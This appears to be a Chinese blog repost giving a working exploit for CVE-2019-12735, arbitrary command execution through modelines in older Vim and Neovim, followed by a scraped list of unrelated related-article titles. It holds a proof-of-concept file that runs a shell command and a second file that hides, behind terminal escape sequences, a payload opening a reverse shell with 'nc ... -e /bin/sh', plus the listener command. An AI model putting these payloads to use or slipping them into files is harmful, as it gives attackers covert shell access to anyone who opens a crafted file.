受影响版本:

Vim < 8.1.1365, Neovim < 0.3.6

前提:开启modeline

0x01 开启modeline

在你的home下的.vimrc文件中增加一行:

set modeline

0x02 Poc

创建文件poc.txt,内容为

:!uname -a||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="

输入命令 $vim poc.txt

系统将会执行uname -a

0x03 反弹shell

创建shell.txt,内容如下

\x1b[?7l\x1bSNothing here.\x1b:silent! w | call system(\'nohup nc 127.0.0.1 9999 -e /bin/sh &\') | redraw! | file | silent! # " vim: set fen fdm=expr fde=assert_fails(\'set\\ fde=x\\ \\|\\ source\\!\\ \\%\') fdl=0: \x16\x1b[1G\x16\x1b[KNothing here."\x16\x1b[D \n

开启两个终端:

一个输入命令 $nc -lvvp 9999

另一个命令为 $vim shell.txt

成功反弹shell

参考链接:

https://github.com/numirias/security/blob/master/doc/2019-06-04_ace-vim-neovim.md

转载于:https://www.cnblogs.com/paperpen/p/10984502.html

文本编辑器Vim/Neovim任意代码执行漏洞(CVE-2019-12735)相关推荐

  1. 基于qtc++设计文本编辑器的代码_文本编辑器Vim/Neovim被曝任意代码执行漏洞,Notepad:兄弟等你好久了...

    犹记前些日子,微软的记事本文本编辑器爆出了本地代码执行漏洞. Google Project Zero研究员Tavis Ormandy宣布在微软的记事本文本编辑器中发现代码执行漏洞. 可以看见,他在no ...

  2. 文本编辑器Vim/Neovim被曝任意代码执行漏洞,Notepad:兄弟等你好久了

    犹记前些日子,微软的记事本文本编辑器爆出了本地代码执行漏洞. Google Project Zero研究员Tavis Ormandy宣布在微软的记事本文本编辑器中发现代码执行漏洞. 可以看见,他在no ...

  3. HP officejet、PageWide打印机任意代码执行漏洞cve-2017-2741 Tenable发布漏洞检测插件...

    打印机无处不在.在企业,在家里,在学校,但你在做网络安全评估的时候是否考虑过他们?你上一次更新打印机固件是什么时候?您是否知道您的打印机有公共漏洞?Tenable安全公司进行了研究,并发布了漏洞检测  ...

  4. php 168任意代码执行漏洞之php的Complex (curly) syntax

    今天了解了php 168的任意代码执行漏洞,Poc: http://192.168.6.128/pentest/cms/php168/member/post.php ?only=1 &show ...

  5. thinkphp日志泄漏漏洞_ThinkPHP框架任意代码执行漏洞的利用及其修复方法

    ThinkPHP是国内著名的开源的PHP框架,是为了简化企业级应用开发和敏捷WEB应用开发而诞生的.最早诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP,并且遵循Apache2 ...

  6. Apple任意代码执行漏洞

    报告编号:B6-2021-072701 报告来源:360CERT 报告作者:360CERT 更新日期:2021-07-27 0x01 漏洞简述 2021年07月27日,360CERT监测发现Apple ...

  7. 记一次海洋cms任意代码执行漏洞拿shell(url一句话)

    实验环境:海洋CMS6.54(后续版本已该洞已补) 1.后台登录尝试 这个站点是个测试站,站里没什么数据. 进入admin.php,是带验证码的后台登录系统,没有验证码的可以用bp爆破.有验证码的也有 ...

  8. Apache Log4j任意代码执行漏洞安全风险通告第三次更新

    奇安信CERT 致力于第一时间为企业级用户提供安全风险通告和有效解决方案. 风险通告 近日,奇安信CERT监测到Apache Log4j存在任意代码执行漏洞.经过分析,该组件存在Java JNDI注入 ...

  9. Nette框架未授权任意代码执行漏洞分析

    Nette框架未授权任意代码执行漏洞分析 漏洞介绍: Nette Framework 是个强大,基于组件的事件驱动 PHP 框架,用来创建 web 应用.Nette Framework 是个现代化风格 ...

  10. 绿盟科技网络安全威胁周报2017.11 关注Apache Struts2 任意代码执行漏洞 CVE-2017-5638...

    绿盟科技发布了本周安全通告,周报编号NSFOCUS-17-11,绿盟科技漏洞库本周新增136条,其中高危63条.本次周报建议大家关注 Apache Struts2 任意代码执行漏洞 CVE-2017- ...

最新文章

  1. vibe前景提取算法示例代码
  2. C语言标准库函数getenv的实现
  3. 修改so_新手向总结:IDA动态调试So的一些坑
  4. 根据BAPI_PO_CREATE1创建采购订单
  5. 首次公开开源PolarDB的总体结构设计和企业级特性
  6. java语音播报案例
  7. apollo编译报错,Error No compiler is provided in this enviroment.Perhaps you are running on a JRE rather
  8. Win10 家庭版找不到 gpedit.msc;win10怎样关闭windows defender
  9. 美国大选数据挖掘相关论文笔记(A 61-million-person experiment in social influence and political mobilization)...
  10. 【Web技术】771- 图片懒加载从简单到复杂
  11. Python 输出到文件两种方式
  12. 光环PMP 串讲冲刺 敏捷
  13. 群辉linux系统,群晖 篇五 提高群晖系统可靠性----Linux系统优化
  14. 点击链接重定向跳转微信公众号关注页、微信关注链接
  15. 牛牛的闹钟--网易2019实习生招聘编程题
  16. 用前沿区块链技术为“元宇宙”筑底
  17. NX二次开发-获得图纸视图的名字UF_OBJ_ask_name
  18. 异步AsyncTask,怎样停止AsyncTask和Thread
  19. ios底部栏设计规范_设计干货:底部导航栏规范设计总结
  20. js中unload什么意思_jQuery - unload事件处理

热门文章

  1. 未知账户(S-1-5-21)无法删除的问题
  2. inDesign教程,如何控制文档中的页数?
  3. MacDroid for mac(安卓手机数据传输助手)
  4. 2018-2019-1 20165323《信息安全系统设计基础》第一周学习总结
  5. linux7 yum安装Mysql5.7
  6. 孟山都公司董事长兼CEO休-格兰特出席2017年中国发展高层论坛
  7. springboot 集成redis实现session共享
  8. Oracle误删除后的找回方法
  9. 【故障处理】CRS-1153错误处理
  10. Feed系统架构资料收集